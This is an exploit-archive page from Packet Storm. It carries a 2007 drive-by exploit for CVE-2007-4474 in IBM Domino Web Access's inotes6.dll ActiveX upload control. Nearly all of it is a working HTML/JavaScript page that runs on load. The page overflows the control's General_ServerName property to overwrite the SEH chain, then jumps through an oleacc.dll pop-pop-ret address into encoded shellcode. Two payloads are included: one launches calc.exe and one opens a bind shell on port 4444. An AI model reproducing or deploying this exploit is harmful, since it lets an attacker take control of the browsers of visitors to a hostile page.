exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

inotes6-overwrite.txt

inotes6-overwrite.txt
Posted Dec 31, 2007
Authored by Elazar Broad

IBM Domino Web Access upload module inotes6.dll SEH overwrite exploit.

tags | exploit, web
advisories | CVE-2007-4474
SHA-256 | 825727e3aded175ca3e3c3e8ad11b552c824070c5e2b4ab525e18606d3e6a02f

inotes6-overwrite.txt

Change Mirror Download
My first attempt at an SEH overwrite exploit. Anyhow, I first 
posted about this issue regarding version 7 of this control, Will
Dormann of the CERT/CC discovered versions 6 and 6.5 are vulnerable
too, see http://www.kb.cert.org/vuls/id/963889. Dwa7w.dll and
inotes6w.dll are unicode, thats my next project. Code is inline and
attached.

---------------------
<!--
written by e.b.
IBM Domino Web Access Upload Module inotes6.dll SEH Overwrite
Exploit
Bad chars: 0x80+
CVE-2007-4474
Tested on Windows XP SP2(fully patched) English, IE6, inotes6.dll
version 6.0.40.0 and version 6.0.48.0
Thanks to str0ke for pointing me in the right direction and to
h.d.m. and the Metasploit crew
-->
<html>
<head>
<title>IBM Domino Web Access Upload Module inotes6.dll SEH
Overwrite Exploit</title>
<script language="JavaScript" defer>
function Check() {

var buf = 'A';
while (buf.length <= 3119) buf = buf + 'A';


// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe
Size=378 Encoder=Alpha2 http://metasploit.com
var shellcode1 =
unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" +

"%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43" +

"%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32" +

"%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d" +

"%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e" +

"%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77" +

"%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36" +

"%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e" +

"%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78" +

"%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59" +

"%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46" +

"%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75" +

"%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a" +

"%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b" +

"%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35" +

"%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b" +

"%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71" +

"%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f" +

"%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33" +

"%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63" +

"%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73" +

"%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70" +

"%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66" +
"%4e%31%75%74%38%70%65%77%70%43");

// win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2
http://metasploit.com
var shellcode2 =
unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" +

"%49%49%49%49%49%49%49%49%49%49%37%49%51%5a%6a%43" +

"%58%30%42%31%50%41%42%6b%41%41%53%41%32%41%41%32" +

"%42%41%30%42%41%58%50%38%41%42%75%78%69%4b%4c%72" +

"%4a%58%6b%52%6d%4a%48%4a%59%6b%4f%6b%4f%69%6f%41" +

"%70%4e%6b%52%4c%74%64%41%34%6e%6b%37%35%55%6c%4c" +

"%4b%71%6c%64%45%61%68%74%41%6a%4f%6e%6b%62%6f%32" +

"%38%6c%4b%33%6f%37%50%55%51%78%6b%31%59%6c%4b%50" +

"%34%6e%6b%46%61%68%6e%45%61%6f%30%6c%59%6c%6c%6b" +

"%34%39%50%41%64%37%77%68%41%69%5a%56%6d%63%31%4b" +

"%72%78%6b%6c%34%75%6b%56%34%31%34%57%58%54%35%6b" +

"%55%6e%6b%33%6f%55%74%74%41%78%6b%41%76%4c%4b%46" +

"%6c%62%6b%6e%6b%41%4f%35%4c%56%61%68%6b%66%63%36" +

"%4c%6c%4b%6b%39%72%4c%44%64%57%6c%61%71%4f%33%47" +

"%41%6b%6b%33%54%4c%4b%63%73%70%30%6c%4b%53%70%64" +

"%4c%6c%4b%72%50%45%4c%4e%4d%6c%4b%37%30%75%58%73" +

"%6e%42%48%4c%4e%52%6e%46%6e%58%6c%56%30%39%6f%58" +

"%56%71%76%46%33%72%46%63%58%30%33%70%32%33%58%54" +

"%37%52%53%45%62%51%4f%50%54%4b%4f%5a%70%33%58%6a" +

"%6b%68%6d%59%6c%45%6b%46%30%49%6f%59%46%73%6f%4e" +

"%69%58%65%73%56%4d%51%58%6d%36%68%64%42%72%75%72" +

"%4a%67%72%59%6f%6e%30%72%48%4a%79%56%69%6b%45%6e" +

"%4d%76%37%6b%4f%58%56%33%63%30%53%50%53%76%33%70" +

"%53%33%73%53%63%37%33%56%33%6b%4f%5a%70%32%46%50" +

"%68%35%41%71%4c%30%66%33%63%6c%49%6d%31%6a%35%70" +

"%68%6e%44%35%4a%52%50%4b%77%71%47%4b%4f%4e%36%30" +

"%6a%52%30%31%41%70%55%59%6f%6e%30%30%68%6c%64%4c" +

"%6d%54%6e%79%79%31%47%59%6f%59%46%46%33%66%35%6b" +

"%4f%58%50%63%58%4b%55%73%79%4c%46%41%59%63%67%4b" +

"%4f%78%56%76%30%53%64%41%44%33%65%79%6f%4e%30%4e" +

"%73%71%78%58%67%61%69%69%56%71%69%62%77%39%6f%6a" +

"%76%51%45%49%6f%4e%30%51%76%53%5a%71%74%72%46%62" +

"%48%30%63%30%6d%6c%49%5a%45%63%5a%62%70%76%39%31" +

"%39%58%4c%4e%69%4d%37%53%5a%33%74%4e%69%4b%52%56" +

"%51%4b%70%6c%33%6f%5a%49%6e%33%72%44%6d%6b%4e%37" +

"%32%76%4c%6e%73%6c%4d%70%7a%76%58%6c%6b%4e%4b%4c" +

"%6b%73%58%53%42%79%6e%6d%63%74%56%6b%4f%30%75%70" +

"%44%4b%4f%79%46%53%6b%70%57%70%52%71%41%50%51%42" +

"%71%41%7a%33%31%42%71%41%41%51%45%66%31%69%6f%5a" +

"%70%50%68%6e%4d%5a%79%56%65%68%4e%33%63%39%6f%58" +

"%56%63%5a%4b%4f%4b%4f%70%37%4b%4f%4a%70%4c%4b%61" +

"%47%6b%4c%4d%53%6b%74%31%74%49%6f%59%46%70%52%59" +

"%6f%4e%30%63%58%6c%30%6f%7a%57%74%61%4f%32%73%4b" +
"%4f%68%56%39%6f%38%50%43");


var next_seh_pointer = unescape("%EB%06%90%90"); //2 byte jump

//oleacc.dll Windows XP SP2 English 0x74C96950 pop ebp - pop -
retbis
//no SafeSEH
var seh_handler = unescape("%50%69%C9%74");

var nop = unescape("%90%90%90%90%90%90%90%90%90%90%90%90");

var m = buf + next_seh_pointer + seh_handler + nop + shellcode1 +
nop;

obj.General_ServerName = m;
obj.InstallBrowserHelperDll();

}

</script>
</head>
<body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:3BFFE033-BF43-11D5-A271-
00A024A51325">
Unable to create object
</object>
</body>
</html>

---------------------

Elazar

--
Compare Cell Phone Carriers- Click Now.
http://tagline.hushmail.com/fc/Ioyw6h4fMiW01DlRT5EdxG74bAoErxGvZoOSv1JtIEt847RmpKnqQI/
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close